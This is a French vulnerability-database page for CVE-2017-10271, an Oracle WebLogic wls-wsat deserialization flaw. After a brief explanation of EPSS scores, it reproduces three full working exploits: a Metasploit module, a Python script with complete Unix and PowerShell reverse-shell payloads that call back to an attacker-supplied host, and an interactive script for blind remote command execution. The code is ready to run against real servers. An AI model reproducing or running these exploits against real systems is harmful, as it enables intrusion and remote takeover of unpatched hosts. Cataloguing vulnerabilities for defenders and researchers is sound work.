CVE-2017-10271 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient # include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', 'Description' => %q( The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself. ), 'License' => MSF_LICENSE, 'Author' => [ 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module 'Luffin', # Proof of Concept 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery ], 'References' => [ ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit ['CVE', '2017-10271'], ['EDB', '43458'] ], 'Platform' => %w{ win unix }, 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] ], 'DisclosureDate' => "Oct 19 2017", # Note that this is by index, rather than name. It's generally easiest # just to put the default at the beginning of the list and skip this # entirely. 'DefaultTarget' => 0 ) ) register_options([ OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]), OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]), # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) ]) end def cmd_base if target['Platform'] == 'win' return 'cmd' else return '/bin/sh' end end def cmd_opt if target['Platform'] == 'win' return '/c' else return '-c' end end # # This generates a XML payload that will execute the desired payload on the RHOST # def exploit_process_builder_payload # Generate a payload which will execute on a *nix machine using /bin/sh xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3" > <void index="0"> <string>#{cmd_base}</string> </void> <void index="1"> <string>#{cmd_opt}</string> </void> <void index="2"> <string>#{payload.encoded.encode(xml: :text)}</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>} end # # This builds a XML payload that will generate a HTTP GET request to our SRVHOST # from the target machine. # def check_process_builder_payload xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8" class="java.beans.XMLDecoder"> <void id="url" class="java.net.URL"> <string>#{get_uri.encode(xml: :text)}</string> </void> <void idref="url"> <void id="stream" method = "openStream" /> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>} end # # In the event that a 'check' host responds, we should respond randomly so that we don't clog up # the logs too much with a no response error or similar. # def on_request_uri(cli, request) random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>' send_response(cli, random_content) @received_request = true end # # The exploit method connects to the remote service and sends a randomly generated string # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive # the response from. This is based off of the exploit technique from # exploits/windows/novell/netiq_pum_eval.rb # # This doesn't work as is because MSF cannot mix HttpServer and HttpClient # at the time of authoring this # # def check # start_service # # print_status('Sending the check payload...') # res = send_request_cgi({ # 'method' => 'POST', # 'uri' => normalize_uri(target_uri.path), # 'data' => check_process_builder_payload, # 'ctype' => 'text/xml;charset=UTF-8' # }, datastore['TIMEOUT']) # # print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...") # # waited = 0 # until @received_request # sleep 1 # waited += 1 # if waited > datastore['HTTP_DELAY'] # stop_service # return Exploit::CheckCode::Safe # end # end # # stop_service # return Exploit::CheckCode::Vulnerable # end # # The exploit method connects to the remote service and sends the specified payload # encapsulated within a SOAP XML body. # def exploit send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'data' => exploit_process_builder_payload, 'ctype' => 'text/xml;charset=UTF-8' }, datastore['TIMEOUT']) end end

#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: Weblogic wls-wsat Component Deserialization RCE # Date Authored: Jan 3, 2018 # Date Announced: 10/19/2017 # Exploit Author: Kevin Kirsche (d3c3pt10n) # Exploit Github: https://github.com/kkirsche/CVE-2017-10271 # Exploit is based off of POC by Luffin from Github # https://github.com/Luffin/CVE-2017-10271 # Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html # Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 # Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS # CVE: CVE-2017-10271 # Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/ # (Python 3) Example check listener: python3 -m http.server 4444 # (Python 2) Example check listener: python -m SimpleHTTPServer 4444 # (Netcat) Example exploit listener: nc -nlvp 4444 from sys import exit from requests import post from argparse import ArgumentParser from random import choice from string import ascii_uppercase, ascii_lowercase, digits from xml.sax.saxutils import escape class Exploit: def __init__(self, check, rhost, lhost, lport, windows): self.url = rhost if not rhost.endswith('/') else rhost.strip('/') self.lhost = lhost self.lport = lport self.check = check if windows: self.target = 'win' else: self.target = 'unix' if self.target == 'unix': # Unix reverse shell # You should also be able to instead use something from MSFVenom. E.g. # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444 self.cmd_payload = ( "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket." "SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2(" "s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" ).format(lhost=self.lhost, lport=self.lport) else: # Windows reverse shell # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444 self.cmd_payload = ( r"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) " r"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='" + self.lhost +"" r"';$p='"+ self.lport + "';$c=New-Object system.net.sockets.tcpclient;$c.connect($a" r",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;" r"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';" r"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;" r"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;" r"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;" r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};" r"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;" r"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)" r" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;" r"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};" r"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if " r"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne" r" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e." r"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};" ) self.cmd_payload = escape(self.cmd_payload) def cmd_base(self): if self.target == 'win': return 'cmd' return '/bin/sh' def cmd_opt(self): if self.target == 'win': return '/c' return '-c' def get_generic_check_payload(self): random_uri = ''.join( choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(16)) generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8" class="java.beans.XMLDecoder"> <object id="url" class="java.net.URL"> <string>http://{lhost}:{lport}/{random_uri}</string> </object> <object idref="url"> <void id="stream" method = "openStream" /> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ''' return generic_check_payload.format( lhost=self.lhost, lport=self.lport, random_uri=random_uri) def get_process_builder_payload(self): process_builder_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3" > <void index="0"> <string>{cmd_base}</string> </void> <void index="1"> <string>{cmd_opt}</string> </void> <void index="2"> <string>{cmd_payload}</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ''' return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(), cmd_payload=self.cmd_payload) def print_banner(self): print("=" * 80) print("CVE-2017-10271 RCE Exploit") print("written by: Kevin Kirsche (d3c3pt10n)") print("Remote Target: {rhost}".format(rhost=self.url)) print("Shell Listener: {lhost}:{lport}".format( lhost=self.lhost, lport=self.lport)) print("=" * 80) def post_exploit(self, data): headers = { "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" } payload = "/wls-wsat/CoordinatorPortType" vulnurl = self.url + payload try: req = post( vulnurl, data=data, headers=headers, timeout=10, verify=False) if self.check: print("[*] Did you get an HTTP GET request back?") else: print("[*] Did you get a shell back?") except Exception as e: print('[!] Connection Error') print(e) def run(self): self.print_banner() if self.check: print('[+] Generating generic check payload') payload = self.get_generic_check_payload() else: print('[+] Generating execution payload') payload = self.get_process_builder_payload() print('[*] Generated:') print(payload) if self.check: print('[+] Running generic check payload') else: print('[+] Running {target} execute payload').format(target=self.target) self.post_exploit(data=payload) if __name__ == "__main__": parser = ArgumentParser( description= 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.' ) parser.add_argument( '-l', '--lhost', required=True, dest='lhost', nargs='?', help='The listening host that the remote server should connect back to') parser.add_argument( '-p', '--lport', required=True, dest='lport', nargs='?', help='The listening port that the remote server should connect back to') parser.add_argument( '-r', '--rhost', required=True, dest='rhost', nargs='?', help='The remote host base URL that we should send the exploit to') parser.add_argument( '-c', '--check', dest='check', action='store_true', help= 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.' ) parser.add_argument( '-w', '--win', dest='windows', action='store_true', help= 'Use the windows cmd payload instead of unix payload (execute mode only).' ) args = parser.parse_args() exploit = Exploit( check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport, windows=args.windows) exploit.run()

import requests import sys url_in = sys.argv[1] payload_url = url_in + "/wls-wsat/CoordinatorPortType" payload_header = {'content-type': 'text/xml'} def payload_command (command_in): html_escape_table = { "&": "&", '"': """, "'": "&apos;", ">": ">", "<": "<", } command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>" payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \ " <soapenv:Header> " \ " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \ " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \ " <void class=\"java.lang.ProcessBuilder\"> \n" \ " <array class=\"java.lang.String\" length=\"3\">" \ " <void index = \"0\"> " \ " <string>cmd</string> " \ " </void> " \ " <void index = \"1\"> " \ " <string>/c</string> " \ " </void> " \ " <void index = \"2\"> " \ + command_filtered + \ " </void> " \ " </array>" \ " <void method=\"start\"/>" \ " </void>" \ " </java>" \ " </work:WorkContext>" \ " </soapenv:Header>" \ " <soapenv:Body/>" \ "</soapenv:Envelope>" return payload_1 def do_post(command_in): result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) if result.status_code == 500: print "Command Executed \n" else: print "Something Went Wrong \n" print "***************************************************** \n" \ "**************** Coded By 1337g ****************** \n" \ "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ "***************************************************** \n" while 1: command_in = raw_input("Eneter your command here: ") if command_in == "exit" : exit(0) do_post(command_in)